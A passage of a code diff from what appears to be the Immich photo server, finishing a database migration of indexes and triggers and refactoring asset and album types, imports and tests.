await sql`ALTER TABLE "person" ADD CONSTRAINT "CHK_b0f82b0ed662bfc24fbb58bb45" CHECK ("birthDate" <= CURRENT_DATE);`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_users_updated_at_asc_id_asc" ON "users" ("updatedAt", "id")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_users_update_id" ON "users" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_0f6fc2fb195f24d19b0fb0d57c" ON "libraries" ("ownerId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_libraries_update_id" ON "libraries" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_91704e101438fd0653f582426d" ON "asset_stack" ("primaryAssetId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_c05079e542fd74de3b5ecb5c1c" ON "asset_stack" ("ownerId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "idx_originalfilename_trigram" ON "assets" USING gin (f_unaccent("originalFileName") gin_trgm_ops)`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_asset_id_stackId" ON "assets" ("id", "stackId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_originalPath_libraryId" ON "assets" ("originalPath", "libraryId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "idx_local_date_time_month" ON "assets" ((date_trunc('MONTH'::text, ("localDateTime" AT TIME ZONE 'UTC'::text)) AT TIME ZONE 'UTC'::text))`.execute(db);
|
||||||
|
await sql`CREATE INDEX "idx_local_date_time" ON "assets" ((("localDateTime" at time zone 'UTC')::date))`.execute(db);
|
||||||
|
await sql`CREATE UNIQUE INDEX "UQ_assets_owner_library_checksum" ON "assets" ("ownerId", "libraryId", "checksum") WHERE ("libraryId" IS NOT NULL)`.execute(db);
|
||||||
|
await sql`CREATE UNIQUE INDEX "UQ_assets_owner_checksum" ON "assets" ("ownerId", "checksum") WHERE ("libraryId" IS NULL)`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_2c5ac0d6fb58b238fd2068de67" ON "assets" ("ownerId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "idx_asset_file_created_at" ON "assets" ("fileCreatedAt")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_8d3efe36c0755849395e6ea866" ON "assets" ("checksum")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_16294b83fa8c0149719a1f631e" ON "assets" ("livePhotoVideoId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_4d66e76dada1ca180f67a205dc" ON "assets" ("originalFileName")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_9977c3c1de01c3d848039a6b90" ON "assets" ("libraryId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_f15d48fa3ea5e4bda05ca8ab20" ON "assets" ("stackId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_assets_duplicateId" ON "assets" ("duplicateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_assets_update_id" ON "assets" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_b22c53f35ef20c28c21637c85f" ON "albums" ("ownerId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_05895aa505a670300d4816debc" ON "albums" ("albumThumbnailAssetId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_albums_update_id" ON "albums" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE UNIQUE INDEX "IDX_activity_like" ON "activity" ("assetId", "userId", "albumId") WHERE ("isLiked" = true)`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_1af8519996fbfb3684b58df280" ON "activity" ("albumId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_3571467bcbe021f66e2bdce96e" ON "activity" ("userId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_8091ea76b12338cb4428d33d78" ON "activity" ("assetId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_activity_update_id" ON "activity" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_e590fa396c6898fcd4a50e4092" ON "albums_assets_assets" ("albumsId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_4bd1303d199f4e72ccdf998c62" ON "albums_assets_assets" ("assetsId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_f48513bf9bccefd6ff3ad30bd0" ON "albums_shared_users_users" ("usersId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_427c350ad49bd3935a50baab73" ON "albums_shared_users_users" ("albumsId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_6c2e267ae764a9413b863a2934" ON "api_keys" ("userId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_api_keys_update_id" ON "api_keys" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_assets_audit_asset_id" ON "assets_audit" ("assetId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_assets_audit_owner_id" ON "assets_audit" ("ownerId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_assets_audit_deleted_at" ON "assets_audit" ("deletedAt")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_5527cc99f530a547093f9e577b" ON "person" ("ownerId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_2bbabe31656b6778c6b87b6102" ON "person" ("faceAssetId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_person_update_id" ON "person" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_bf339a24070dac7e71304ec530" ON "asset_faces" ("personId", "assetId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_asset_faces_assetId_personId" ON "asset_faces" ("assetId", "personId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_02a43fd0b3c50fb6d7f0cb7282" ON "asset_faces" ("assetId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_95ad7106dd7b484275443f580f" ON "asset_faces" ("personId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_asset_files_assetId" ON "asset_files" ("assetId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_asset_files_update_id" ON "asset_files" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_ownerId_createdAt" ON "audit" ("ownerId", "createdAt")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "exif_city" ON "exif" ("city")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_live_photo_cid" ON "exif" ("livePhotoCID")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_auto_stack_id" ON "exif" ("autoStackId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_asset_exif_update_id" ON "exif" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "face_index" ON "face_search" USING hnsw (embedding vector_cosine_ops) WITH (ef_construction = 300, m = 16)`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_geodata_gist_earthcoord" ON "geodata_places" (ll_to_earth_public(latitude, longitude))`.execute(db);
|
||||||
|
await sql`CREATE INDEX "idx_geodata_places_name" ON "geodata_places" USING gin (f_unaccent("name") gin_trgm_ops)`.execute(db);
|
||||||
|
await sql`CREATE INDEX "idx_geodata_places_admin2_name" ON "geodata_places" USING gin (f_unaccent("admin2Name") gin_trgm_ops)`.execute(db);
|
||||||
|
await sql`CREATE INDEX "idx_geodata_places_admin1_name" ON "geodata_places" USING gin (f_unaccent("admin1Name") gin_trgm_ops)`.execute(db);
|
||||||
|
await sql`CREATE INDEX "idx_geodata_places_alternate_names" ON "geodata_places" USING gin (f_unaccent("alternateNames") gin_trgm_ops)`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_575842846f0c28fa5da46c99b1" ON "memories" ("ownerId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_memories_update_id" ON "memories" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_984e5c9ab1f04d34538cd32334" ON "memories_assets_assets" ("memoriesId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_6942ecf52d75d4273de19d2c16" ON "memories_assets_assets" ("assetsId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_partners_audit_shared_by_id" ON "partners_audit" ("sharedById")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_partners_audit_shared_with_id" ON "partners_audit" ("sharedWithId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_partners_audit_deleted_at" ON "partners_audit" ("deletedAt")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_7e077a8b70b3530138610ff5e0" ON "partners" ("sharedById")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_d7e875c6c60e661723dbf372fd" ON "partners" ("sharedWithId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_partners_update_id" ON "partners" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_57de40bc620f456c7311aa3a1e" ON "sessions" ("userId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_sessions_update_id" ON "sessions" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_66fe3837414c5a9f1c33ca4934" ON "shared_links" ("userId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_sharedlink_key" ON "shared_links" ("key")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_sharedlink_albumId" ON "shared_links" ("albumId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_5b7decce6c8d3db9593d6111a6" ON "shared_link__asset" ("assetsId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_c9fab4aa97ffd1b034f3d6581a" ON "shared_link__asset" ("sharedLinksId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "clip_index" ON "smart_search" USING hnsw (embedding vector_cosine_ops) WITH (ef_construction = 300, m = 16)`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_d8ddd9d687816cc490432b3d4b" ON "session_sync_checkpoints" ("sessionId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_session_sync_checkpoints_update_id" ON "session_sync_checkpoints" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_92e67dc508c705dd66c9461557" ON "tags" ("userId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_9f9590cc11561f1f48ff034ef9" ON "tags" ("parentId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_tags_update_id" ON "tags" ("updateId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_tag_asset_assetsId_tagsId" ON "tag_asset" ("assetsId", "tagsId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_f8e8a9e893cb5c54907f1b798e" ON "tag_asset" ("assetsId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_e99f31ea4cdf3a2c35c7287eb4" ON "tag_asset" ("tagsId")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_15fbcbc67663c6bfc07b354c22" ON "tags_closure" ("id_ancestor")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_b1a2a7ed45c29179b5ad51548a" ON "tags_closure" ("id_descendant")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_users_audit_deleted_at" ON "users_audit" ("deletedAt")`.execute(db);
|
||||||
|
await sql`CREATE INDEX "IDX_6afb43681a21cf7815932bc38a" ON "user_metadata" ("userId")`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "users_delete_audit"
|
||||||
|
AFTER DELETE ON "users"
|
||||||
|
REFERENCING OLD TABLE AS "old"
|
||||||
|
FOR EACH STATEMENT
|
||||||
|
WHEN (pg_trigger_depth() = 0)
|
||||||
|
EXECUTE FUNCTION users_delete_audit();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "users_updated_at"
|
||||||
|
BEFORE UPDATE ON "users"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "libraries_updated_at"
|
||||||
|
BEFORE UPDATE ON "libraries"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "assets_delete_audit"
|
||||||
|
AFTER DELETE ON "assets"
|
||||||
|
REFERENCING OLD TABLE AS "old"
|
||||||
|
FOR EACH STATEMENT
|
||||||
|
WHEN (pg_trigger_depth() = 0)
|
||||||
|
EXECUTE FUNCTION assets_delete_audit();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "assets_updated_at"
|
||||||
|
BEFORE UPDATE ON "assets"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "albums_updated_at"
|
||||||
|
BEFORE UPDATE ON "albums"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "activity_updated_at"
|
||||||
|
BEFORE UPDATE ON "activity"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "api_keys_updated_at"
|
||||||
|
BEFORE UPDATE ON "api_keys"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "person_updated_at"
|
||||||
|
BEFORE UPDATE ON "person"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "asset_files_updated_at"
|
||||||
|
BEFORE UPDATE ON "asset_files"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "asset_exif_updated_at"
|
||||||
|
BEFORE UPDATE ON "exif"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "memories_updated_at"
|
||||||
|
BEFORE UPDATE ON "memories"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "partners_delete_audit"
|
||||||
|
AFTER DELETE ON "partners"
|
||||||
|
REFERENCING OLD TABLE AS "old"
|
||||||
|
FOR EACH STATEMENT
|
||||||
|
WHEN (pg_trigger_depth() = 0)
|
||||||
|
EXECUTE FUNCTION partners_delete_audit();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "partners_updated_at"
|
||||||
|
BEFORE UPDATE ON "partners"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "sessions_updated_at"
|
||||||
|
BEFORE UPDATE ON "sessions"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "session_sync_checkpoints_updated_at"
|
||||||
|
BEFORE UPDATE ON "session_sync_checkpoints"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
await sql`CREATE OR REPLACE TRIGGER "tags_updated_at"
|
||||||
|
BEFORE UPDATE ON "tags"
|
||||||
|
FOR EACH ROW
|
||||||
|
EXECUTE FUNCTION updated_at();`.execute(db);
|
||||||
|
}
|
||||||
|
|
||||||
|
export async function down(): Promise<void> {
|
||||||
|
// not implemented
|
||||||
|
}
|
@ -1,5 +1,4 @@
|
|||||||
import { UpdatedAtTrigger, UpdateIdColumn } from 'src/decorators';
|
import { UpdatedAtTrigger, UpdateIdColumn } from 'src/decorators';
|
||||||
import { ASSET_CHECKSUM_CONSTRAINT } from 'src/entities/asset.entity';
|
|
||||||
import { AssetStatus, AssetType } from 'src/enum';
|
import { AssetStatus, AssetType } from 'src/enum';
|
||||||
import { assets_status_enum } from 'src/schema/enums';
|
import { assets_status_enum } from 'src/schema/enums';
|
||||||
import { assets_delete_audit } from 'src/schema/functions';
|
import { assets_delete_audit } from 'src/schema/functions';
|
||||||
@ -17,6 +16,7 @@ import {
|
|||||||
Table,
|
Table,
|
||||||
UpdateDateColumn,
|
UpdateDateColumn,
|
||||||
} from 'src/sql-tools';
|
} from 'src/sql-tools';
|
||||||
|
import { ASSET_CHECKSUM_CONSTRAINT } from 'src/utils/database';
|
||||||
|
|
||||||
@Table('assets')
|
@Table('assets')
|
||||||
@UpdatedAtTrigger('assets_updated_at')
|
@UpdatedAtTrigger('assets_updated_at')
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
import { Column, Index, PrimaryColumn, Table } from 'src/sql-tools';
|
import { Column, Index, PrimaryColumn, Table } from 'src/sql-tools';
|
||||||
|
|
||||||
@Table({ name: 'geodata_places' })
|
@Table({ name: 'geodata_places', synchronize: false })
|
||||||
@Index({
|
@Index({
|
||||||
name: 'idx_geodata_places_alternate_names',
|
name: 'idx_geodata_places_alternate_names',
|
||||||
using: 'gin',
|
using: 'gin',
|
||||||
@ -26,11 +26,10 @@ import { Column, Index, PrimaryColumn, Table } from 'src/sql-tools';
|
|||||||
synchronize: false,
|
synchronize: false,
|
||||||
})
|
})
|
||||||
@Index({
|
@Index({
|
||||||
name: 'idx_geodata_places_gist_earthcoord',
|
name: 'IDX_geodata_gist_earthcoord',
|
||||||
expression: 'll_to_earth_public(latitude, longitude)',
|
expression: 'll_to_earth_public(latitude, longitude)',
|
||||||
synchronize: false,
|
synchronize: false,
|
||||||
})
|
})
|
||||||
@Table({ name: 'idx_geodata_places', synchronize: false })
|
|
||||||
export class GeodataPlacesTable {
|
export class GeodataPlacesTable {
|
||||||
@PrimaryColumn({ type: 'integer' })
|
@PrimaryColumn({ type: 'integer' })
|
||||||
id!: number;
|
id!: number;
|
||||||
|
@ -6,15 +6,15 @@ import {
|
|||||||
AlbumStatisticsResponseDto,
|
AlbumStatisticsResponseDto,
|
||||||
CreateAlbumDto,
|
CreateAlbumDto,
|
||||||
GetAlbumsDto,
|
GetAlbumsDto,
|
||||||
UpdateAlbumDto,
|
|
||||||
UpdateAlbumUserDto,
|
|
||||||
mapAlbum,
|
mapAlbum,
|
||||||
|
MapAlbumDto,
|
||||||
mapAlbumWithAssets,
|
mapAlbumWithAssets,
|
||||||
mapAlbumWithoutAssets,
|
mapAlbumWithoutAssets,
|
||||||
|
UpdateAlbumDto,
|
||||||
|
UpdateAlbumUserDto,
|
||||||
} from 'src/dtos/album.dto';
|
} from 'src/dtos/album.dto';
|
||||||
import { BulkIdResponseDto, BulkIdsDto } from 'src/dtos/asset-ids.response.dto';
|
import { BulkIdResponseDto, BulkIdsDto } from 'src/dtos/asset-ids.response.dto';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
import { AlbumEntity } from 'src/entities/album.entity';
|
|
||||||
import { Permission } from 'src/enum';
|
import { Permission } from 'src/enum';
|
||||||
import { AlbumAssetCount, AlbumInfoOptions } from 'src/repositories/album.repository';
|
import { AlbumAssetCount, AlbumInfoOptions } from 'src/repositories/album.repository';
|
||||||
import { BaseService } from 'src/services/base.service';
|
import { BaseService } from 'src/services/base.service';
|
||||||
@ -39,7 +39,7 @@ export class AlbumService extends BaseService {
|
|||||||
async getAll({ user: { id: ownerId } }: AuthDto, { assetId, shared }: GetAlbumsDto): Promise<AlbumResponseDto[]> {
|
async getAll({ user: { id: ownerId } }: AuthDto, { assetId, shared }: GetAlbumsDto): Promise<AlbumResponseDto[]> {
|
||||||
await this.albumRepository.updateThumbnails();
|
await this.albumRepository.updateThumbnails();
|
||||||
|
|
||||||
let albums: AlbumEntity[];
|
let albums: MapAlbumDto[];
|
||||||
if (assetId) {
|
if (assetId) {
|
||||||
albums = await this.albumRepository.getByAssetId(ownerId, assetId);
|
albums = await this.albumRepository.getByAssetId(ownerId, assetId);
|
||||||
} else if (shared === true) {
|
} else if (shared === true) {
|
||||||
|
@ -8,10 +8,11 @@ import { Stats } from 'node:fs';
|
|||||||
import { AssetFile } from 'src/database';
|
import { AssetFile } from 'src/database';
|
||||||
import { AssetMediaStatus, AssetRejectReason, AssetUploadAction } from 'src/dtos/asset-media-response.dto';
|
import { AssetMediaStatus, AssetRejectReason, AssetUploadAction } from 'src/dtos/asset-media-response.dto';
|
||||||
import { AssetMediaCreateDto, AssetMediaReplaceDto, AssetMediaSize, UploadFieldName } from 'src/dtos/asset-media.dto';
|
import { AssetMediaCreateDto, AssetMediaReplaceDto, AssetMediaSize, UploadFieldName } from 'src/dtos/asset-media.dto';
|
||||||
import { ASSET_CHECKSUM_CONSTRAINT, AssetEntity } from 'src/entities/asset.entity';
|
import { MapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { AssetFileType, AssetStatus, AssetType, CacheControl, JobName } from 'src/enum';
|
import { AssetFileType, AssetStatus, AssetType, CacheControl, JobName } from 'src/enum';
|
||||||
import { AuthRequest } from 'src/middleware/auth.guard';
|
import { AuthRequest } from 'src/middleware/auth.guard';
|
||||||
import { AssetMediaService } from 'src/services/asset-media.service';
|
import { AssetMediaService } from 'src/services/asset-media.service';
|
||||||
|
import { ASSET_CHECKSUM_CONSTRAINT } from 'src/utils/database';
|
||||||
import { ImmichFileResponse } from 'src/utils/file';
|
import { ImmichFileResponse } from 'src/utils/file';
|
||||||
import { assetStub } from 'test/fixtures/asset.stub';
|
import { assetStub } from 'test/fixtures/asset.stub';
|
||||||
import { authStub } from 'test/fixtures/auth.stub';
|
import { authStub } from 'test/fixtures/auth.stub';
|
||||||
@ -173,7 +174,7 @@ const assetEntity = Object.freeze({
|
|||||||
},
|
},
|
||||||
livePhotoVideoId: null,
|
livePhotoVideoId: null,
|
||||||
sidecarPath: null,
|
sidecarPath: null,
|
||||||
}) as AssetEntity;
|
} as MapAsset);
|
||||||
|
|
||||||
const existingAsset = Object.freeze({
|
const existingAsset = Object.freeze({
|
||||||
...assetEntity,
|
...assetEntity,
|
||||||
@ -182,18 +183,18 @@ const existingAsset = Object.freeze({
|
|||||||
checksum: Buffer.from('_getExistingAsset', 'utf8'),
|
checksum: Buffer.from('_getExistingAsset', 'utf8'),
|
||||||
libraryId: 'libraryId',
|
libraryId: 'libraryId',
|
||||||
originalFileName: 'existing-filename.jpeg',
|
originalFileName: 'existing-filename.jpeg',
|
||||||
}) as AssetEntity;
|
}) as MapAsset;
|
||||||
|
|
||||||
const sidecarAsset = Object.freeze({
|
const sidecarAsset = Object.freeze({
|
||||||
...existingAsset,
|
...existingAsset,
|
||||||
sidecarPath: 'sidecar-path',
|
sidecarPath: 'sidecar-path',
|
||||||
checksum: Buffer.from('_getExistingAssetWithSideCar', 'utf8'),
|
checksum: Buffer.from('_getExistingAssetWithSideCar', 'utf8'),
|
||||||
}) as AssetEntity;
|
}) as MapAsset;
|
||||||
|
|
||||||
const copiedAsset = Object.freeze({
|
const copiedAsset = Object.freeze({
|
||||||
id: 'copied-asset',
|
id: 'copied-asset',
|
||||||
originalPath: 'copied-path',
|
originalPath: 'copied-path',
|
||||||
}) as AssetEntity;
|
}) as MapAsset;
|
||||||
|
|
||||||
describe(AssetMediaService.name, () => {
|
describe(AssetMediaService.name, () => {
|
||||||
let sut: AssetMediaService;
|
let sut: AssetMediaService;
|
||||||
@ -819,8 +820,8 @@ describe(AssetMediaService.name, () => {
|
|||||||
const file2 = Buffer.from('53be335e99f18a66ff12e9a901c7a6171dd76573', 'hex');
|
const file2 = Buffer.from('53be335e99f18a66ff12e9a901c7a6171dd76573', 'hex');
|
||||||
|
|
||||||
mocks.asset.getByChecksums.mockResolvedValue([
|
mocks.asset.getByChecksums.mockResolvedValue([
|
||||||
{ id: 'asset-1', checksum: file1 } as AssetEntity,
|
{ id: 'asset-1', checksum: file1, deletedAt: null },
|
||||||
{ id: 'asset-2', checksum: file2 } as AssetEntity,
|
{ id: 'asset-2', checksum: file2, deletedAt: null },
|
||||||
]);
|
]);
|
||||||
|
|
||||||
await expect(
|
await expect(
|
||||||
@ -856,7 +857,7 @@ describe(AssetMediaService.name, () => {
|
|||||||
const file1 = Buffer.from('d2947b871a706081be194569951b7db246907957', 'hex');
|
const file1 = Buffer.from('d2947b871a706081be194569951b7db246907957', 'hex');
|
||||||
const file2 = Buffer.from('53be335e99f18a66ff12e9a901c7a6171dd76573', 'hex');
|
const file2 = Buffer.from('53be335e99f18a66ff12e9a901c7a6171dd76573', 'hex');
|
||||||
|
|
||||||
mocks.asset.getByChecksums.mockResolvedValue([{ id: 'asset-1', checksum: file1 } as AssetEntity]);
|
mocks.asset.getByChecksums.mockResolvedValue([{ id: 'asset-1', checksum: file1, deletedAt: null }]);
|
||||||
|
|
||||||
await expect(
|
await expect(
|
||||||
sut.bulkUploadCheck(authStub.admin, {
|
sut.bulkUploadCheck(authStub.admin, {
|
||||||
|
@ -2,6 +2,7 @@ import { BadRequestException, Injectable, InternalServerErrorException, NotFound
|
|||||||
import { extname } from 'node:path';
|
import { extname } from 'node:path';
|
||||||
import sanitize from 'sanitize-filename';
|
import sanitize from 'sanitize-filename';
|
||||||
import { StorageCore } from 'src/cores/storage.core';
|
import { StorageCore } from 'src/cores/storage.core';
|
||||||
|
import { Asset } from 'src/database';
|
||||||
import {
|
import {
|
||||||
AssetBulkUploadCheckResponseDto,
|
AssetBulkUploadCheckResponseDto,
|
||||||
AssetMediaResponseDto,
|
AssetMediaResponseDto,
|
||||||
@ -20,13 +21,13 @@ import {
|
|||||||
UploadFieldName,
|
UploadFieldName,
|
||||||
} from 'src/dtos/asset-media.dto';
|
} from 'src/dtos/asset-media.dto';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
import { ASSET_CHECKSUM_CONSTRAINT, AssetEntity } from 'src/entities/asset.entity';
|
|
||||||
import { AssetStatus, AssetType, CacheControl, JobName, Permission, StorageFolder } from 'src/enum';
|
import { AssetStatus, AssetType, CacheControl, JobName, Permission, StorageFolder } from 'src/enum';
|
||||||
import { AuthRequest } from 'src/middleware/auth.guard';
|
import { AuthRequest } from 'src/middleware/auth.guard';
|
||||||
import { BaseService } from 'src/services/base.service';
|
import { BaseService } from 'src/services/base.service';
|
||||||
import { UploadFile } from 'src/types';
|
import { UploadFile } from 'src/types';
|
||||||
import { requireUploadAccess } from 'src/utils/access';
|
import { requireUploadAccess } from 'src/utils/access';
|
||||||
import { asRequest, getAssetFiles, onBeforeLink } from 'src/utils/asset.util';
|
import { asRequest, getAssetFiles, onBeforeLink } from 'src/utils/asset.util';
|
||||||
|
import { ASSET_CHECKSUM_CONSTRAINT } from 'src/utils/database';
|
||||||
import { getFilenameExtension, getFileNameWithoutExtension, ImmichFileResponse } from 'src/utils/file';
|
import { getFilenameExtension, getFileNameWithoutExtension, ImmichFileResponse } from 'src/utils/file';
|
||||||
import { mimeTypes } from 'src/utils/mime-types';
|
import { mimeTypes } from 'src/utils/mime-types';
|
||||||
import { fromChecksum } from 'src/utils/request';
|
import { fromChecksum } from 'src/utils/request';
|
||||||
@ -212,7 +213,7 @@ export class AssetMediaService extends BaseService {
|
|||||||
const asset = await this.findOrFail(id);
|
const asset = await this.findOrFail(id);
|
||||||
const size = dto.size ?? AssetMediaSize.THUMBNAIL;
|
const size = dto.size ?? AssetMediaSize.THUMBNAIL;
|
||||||
|
|
||||||
const { thumbnailFile, previewFile, fullsizeFile } = getAssetFiles(asset.files);
|
const { thumbnailFile, previewFile, fullsizeFile } = getAssetFiles(asset.files ?? []);
|
||||||
let filepath = previewFile?.path;
|
let filepath = previewFile?.path;
|
||||||
if (size === AssetMediaSize.THUMBNAIL && thumbnailFile) {
|
if (size === AssetMediaSize.THUMBNAIL && thumbnailFile) {
|
||||||
filepath = thumbnailFile.path;
|
filepath = thumbnailFile.path;
|
||||||
@ -375,7 +376,7 @@ export class AssetMediaService extends BaseService {
|
|||||||
* Uses only vital properties excluding things like: stacks, faces, smart search info, etc,
|
* Uses only vital properties excluding things like: stacks, faces, smart search info, etc,
|
||||||
* and then queues a METADATA_EXTRACTION job.
|
* and then queues a METADATA_EXTRACTION job.
|
||||||
*/
|
*/
|
||||||
private async createCopy(asset: AssetEntity): Promise<AssetEntity> {
|
private async createCopy(asset: Omit<Asset, 'id'>) {
|
||||||
const created = await this.assetRepository.create({
|
const created = await this.assetRepository.create({
|
||||||
ownerId: asset.ownerId,
|
ownerId: asset.ownerId,
|
||||||
originalPath: asset.originalPath,
|
originalPath: asset.originalPath,
|
||||||
@ -398,12 +399,7 @@ export class AssetMediaService extends BaseService {
|
|||||||
return created;
|
return created;
|
||||||
}
|
}
|
||||||
|
|
||||||
private async create(
|
private async create(ownerId: string, dto: AssetMediaCreateDto, file: UploadFile, sidecarFile?: UploadFile) {
|
||||||
ownerId: string,
|
|
||||||
dto: AssetMediaCreateDto,
|
|
||||||
file: UploadFile,
|
|
||||||
sidecarFile?: UploadFile,
|
|
||||||
): Promise<AssetEntity> {
|
|
||||||
const asset = await this.assetRepository.create({
|
const asset = await this.assetRepository.create({
|
||||||
ownerId,
|
ownerId,
|
||||||
libraryId: null,
|
libraryId: null,
|
||||||
